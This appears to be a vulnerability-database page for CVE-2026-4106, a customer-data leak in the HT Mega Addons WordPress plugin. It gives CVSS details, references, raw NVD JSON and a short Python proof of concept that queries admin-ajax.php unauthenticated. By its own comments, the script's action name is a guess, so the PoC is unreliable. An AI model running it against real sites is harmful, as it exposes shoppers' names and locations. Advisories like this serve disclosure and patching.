CVE-2026-4106

Description

The HT Mega Addons for Elementor WordPress plugin before 3.0.7 contains an unauthenticated AJAX action returning some PII (such as full name, city, state and country) of customers who placed orders in the last 7 days

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HT Mega Addons for Elementor < 3.0.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (replace with actual target)
target_url = "http://example.com/wp-admin/admin-ajax.php"

# The specific action name may vary based on plugin version or configuration
# This is a representative example of the exploit payload.
payload = {
    "action": "ht_mega_get_recent_orders", # Example action name, verify in source code
    "security": "" # If nonce is required, this might be empty or bypassed
}

try:
    # Sending unauthenticated POST request
    response = requests.post(target_url, data=payload)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
        
        # Check if PII data is present in the response
        if "full_name" in response.text or "city" in response.text:
            print("[!] Potential PII data leaked!")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4106
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4106
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4106/
[4] VulDB https://vuldb.com/cve/CVE-2026-4106
[5] https://wpscan.com/vulnerability/9477ead2-3990-4aae-8e66-09ee2f4daa3e/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4106", "sourceIdentifier": "[email protected]", "published": "2026-04-23T07:16:41.210", "lastModified": "2026-04-23T18:16:30.063", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HT Mega Addons for Elementor WordPress plugin before 3.0.7 contains an unauthenticated AJAX action returning some PII (such as full name, city, state and country) of customers who placed orders in the last 7 days"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://wpscan.com/vulnerability/9477ead2-3990-4aae-8e66-09ee2f4daa3e/", "source": "[email protected]"}]}}